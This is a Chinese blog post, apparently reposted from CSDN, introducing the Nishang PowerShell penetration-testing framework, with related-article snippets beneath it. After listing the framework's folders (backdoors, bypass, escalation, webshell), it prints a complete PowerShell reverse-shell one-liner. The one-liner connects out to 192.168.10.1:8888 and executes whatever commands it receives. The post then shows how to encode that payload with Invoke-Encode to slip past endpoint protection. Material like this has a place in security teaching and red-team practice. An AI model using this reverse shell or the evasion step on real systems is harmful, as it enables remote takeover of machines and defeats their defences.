PowerShell渗透工具Nishang

最新推荐文章于 2023-06-09 16:03:18 发布
最新推荐文章于 2023-06-09 16:03:18 发布
阅读量533 收藏 3
点赞数
分类专栏: 工具的使用
原文链接:https://blog.csdn.net/qq_36119192/article/details/103103880
版权

目录

Nishang

Nishang的目录结构

Nishang的使用

Invoke-Decode.ps1

Nishang

Nishang是一个PowerShell脚本和有效载荷的框架和集合,它使PowerShell能够用于攻击安全性、渗透测试和红队。它是基于PowerShell的渗透测试专用工具,集成了框架、脚本和各种Payload,包括下载和执行、键盘记录、DNS、延时命令等脚本,被广泛用于渗透测试的各个阶段。Nishang在PowerShell3.0及以上的环境中才能正常使用,所以Windows7、Server2008下默认是有点小问题的。项目地址:https://github.com/samratashok/nishang

Nishang的目录结构

  • ActiveDirectory:活动目录
  • Antak-WebShell:WebShell
  • Backdoors:后门
  • Bypass:绕过
  • Client:客户端
  • Escalation:提权
  • Execution:执行
  • Gather:信息收集
  • MITM:
  • Misc:发音
  • Pivot:跳板、远程执行exe
  • Prasadhak:Virustotal 
  • Scan:扫描
  • Shells:shell
  • Utility:杂项
  • Powerpreter:Meterpreter会话

Nishang的使用

导入所有的脚本到当前的PowerShell会话中(PowerShell v3之前)

Import-Module -verbose  .\nishang.psm1

然后输入命令:Get-Command -Module nishang   查看nishang有哪些功能

Invoke-Decode.ps1

该脚本是Nishang的Utility目录下的,该脚本用于对payload进行编码。

例如,我们现在想利用powershell反弹shell。

我们在服务端使用powercat进行监听

我们在客户端的反弹shell的脚本如下,名为 reverse.ps1

$client = New-Object System.Net.Sockets.TCPClient('192.168.10.1',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

但是由于客户端机器存在防护,直接指向该脚本反弹不了shell。所以,我们现在就利用 Invoke-Encode.ps1脚本对reverse.ps1进行编码。执行完成后,会生成两个文件:encoded.txt 和 encodedcommand.txt,前者是编码的数据,后者是编码后的命令。


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Import-Module .\Invoke-Encode.ps
     
     1
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Invoke-Encode -DataToEncode .\reverse.ps
     
     1 -OutCommand

我们复制encodedcommand.txt 里面的命令,在powershell中执行,可以看到,反弹shell成功。

未完待续。。

Mamba start
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PowerShell渗透工具Nishang的用法
谢公子的博客
01-14 3132
目录 Nishang Nishang的目录结构 Nishang的使用 Invoke-Decode.ps1 Nishang Nishang是一个PowerShell脚本和有效载荷的框架和集合,它使PowerShell能够用于攻击安全性、渗透测试和红队。它是基于PowerShell渗透测试专用工具,集成了框架、脚本和各种Payload,包括下载和执行、键盘记录、DNS、延时命令等脚本...
PowerShell攻防进阶篇:nishang工具用法详解
weixin_33795806的博客
09-14 913
本文讲的是PowerShell攻防进阶篇:nishang工具用法详解, 1.简介 Nishang是一款针对PowerShell渗透工具。说到渗透工具,那自然便是老外开发的东西。国人开发的东西,也不是不行,只不过不被认可罢了。不管是谁开发的,既然跟渗透有关系,那自然是对我们有帮助的,学习就好。来源什么的都不重要。总之,nishang也是一款不可多得的好...
基础篇:内网工具Nishang PowerShell
qq_60115503的博客
04-12 1774
Nishang介绍 Nishang是一个PowerShell攻击框架,它是Powershell攻击脚本和有效载荷的一个集合,Nishang被广泛应用于渗透测试的各个阶段
Powershell---Nishang工具简介
weixin_43679009的博客
12-01 1315
PowershellNishang工具简介 Nishang简介及安装 Nishang是一款针对Powershell渗透工具。他基于Powershell渗透测试专用工具,集成了框架、脚本和各种Payload,包括了下载和执行、键盘记录、DNS、延时命令等脚本,被广泛应用于渗透测试是的各个阶段。 Nishang的安装 下载地址 Nishang要在Powershell 3.0以上的环境中才可以正常使用,也就是说在Windows7下默认是有点小问题的,因为win7下自带的环境是PowerSh
PowerOPS—PowerShell的移动渗透测试开发工具
SAKAISON的博客
08-24 1650
PowerOPS能够简化PowerShell的入侵测试流程。该工具包含多个PowerShell攻击模块,使用C#编写无需依赖powershell.exe,但需要在PowerShell运行空间环境(.NET)中执行PowerShell命令。 PowerOPS简化PowerShell使用流程及躲避杀毒检测的原理如下: 1.通过.NET 框架帮助GPO、SRP、App Locke
POWERSHELL_内网渗透实例.pdf
08-07
目录 1.POWERSHELL简介 2.POWERSPLOIT 3.内网渗透实例
ReportingServicesTools:报表服务Powershell工具
05-03
Reporting Services PowerShell SQL Server Reporting Services PowerShell实用程序 概要 该项目包含PowerShell脚本,使您可以对SQL Server Reporting Services和Power BI Report Server执行各种操作。 为了成功...
tools:渗透工具脚本
03-05
tools:渗透工具脚本
Powershell中使用WMI工具例子
01-20
支持所有版本 WMI是一个强大的技术:只需要简单的指定一个WMI类名就能返回它类的所有实例: 代码如下: PS> Get-WmiObject -Class Win32_BIOS ...这里有一款查找工具: 代码如下: function Find-WMIClass {  p
Nishang2022最新可用版本,稳定
06-28
Nishang是一个PowerShell攻击框架,它是Powershell攻击脚本和有效载荷的一个集合,Nishang被广泛应用于渗透测试的各个阶段 NiShang目录介绍 ActiveDirectory:活动目录 Antak-Webshell:在内存中执行PowerShell脚本,...
nishang, Nishang PowerShell测试和攻击性安全.zip
09-18
nishang, Nishang PowerShell测试和攻击性安全 Nishang是一个框架和脚本,它允许使用PowerShell安全性。穿透测试和红色组合的脚本。 在渗透测试的所有阶段,Nishang都是有用的。按 nikhil_mitt用法导入当前PowerShell会话( PowerShel
PowerShell简介 及 渗透工具
prettyX的博客
12-31 541
0X00 内容 常见的PowerShell渗透工具 PowerShell简介 0X01 常见的PowerShell渗透工具 PowerSploit:这是众多PowerShell工具中被广泛使用的PowerShell后期漏洞利用框架,常用于信息探测、特权提升、凭证窃取、持久化等操作。 Nishang:基于PowerShell渗透测试专用工具,集成了框架、脚本和各种Payload,包含...
基于powershell渗透测试工具nishang
AmyBaby00的博客
11-22 603
本文为学习笔记,仅限学习交流。 不得利用、从事危害国家或人民安全、荣誉和利益等活动。 请参阅《中华人民共和国网络安全法》 Nishang是一款针对PowerShell渗透工具。 先到github上去下载nishang,并解压 目标机下载nishang 地址:https://github.com/samratashok/nishang 攻击机下载icmpsh 地址:git clone https:...
Final——Nishang
weixin_33928467的博客
06-23 281
一、介绍 Nishang是基于PowerShell渗透测试专用工具,它集成了框架、脚本和各种payload,被广泛应用于渗透测试的各个阶段。 二、使用 下载脚本工具Nishang Nishang需要我们的Powershell版本在v3以上才能使用。 查看当前Powershell版本:get-host 进入相应目录下 导入框架:Import-Module .\nishang.psm1...
PowerShell攻击:nishang
weixin_41082546的博客
10-26 513
nishanhg 下载地址:https://github.com/samratashok/nishing 1.简介 nishang的使用是要在PowerShell 3.0以上的环境中才可以正常使用。也就是说win7下是有点小问题的。因为win7下自带的环境是PowerShell 2.0 2.环境准备 查看powershell版本 get-host 或者 $PSVersionTable.P...
powershell攻击指南——Nishang
willow_liang的博客
12-08 464
1.简介 Nishang是一款针 对PowerShell渗透工具。它基于PowerShell渗透测试专用工具,集成了框架、脚本和各种Payload,包括了下载和执行、键盘记录、DNS、延时命令等脚本,被广泛应用于渗透测试的各个阶段。其下载地址为https://github.com/samratashok/nishangNishang要在powershell3.0以上的环境中才可以正常使用。 2.模块导入 Get-Command -Moudle nishang Nishang模块.
NishangPowershell 隐藏通信隧道、WebShell 后门
weixin_46104215的博客
11-24 2433
一、Powershell 隐藏通信隧道 1.基于TCP协议的 Powershell 交互式 Shell Invoke-PowerShellTcp 是基于TCP协议的 Powershell 正向连接或反向连接 shell IPAddress <String> //选择 -Reverse 选项时表示需要连接 ip 地址 Port <int32> //选择 -Reverse 选项时表示需要连接的端口,选择 -Bind 选项时表示需要监听的端口 Reverse /
利用powershell脚本进行内网渗透
h1825819493的博客
06-09 288
ps1是powershell脚本的拓展名,就相当于cmd的.bat脚本,但是他更加强大。
nishang使用
weixin_48776804的博客
07-24 328
nishang使用
powershell工具培训
最新发布
11-19
PowerShell是一种强大的自动化工具,它可以帮助管理人员简化管理任务和提高工作效率。为了正确地使用PowerShell,专业的培训是必不可少的。 PowerShell工具培训可以帮助学员从基础知识开始学习PowerShell的语法、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值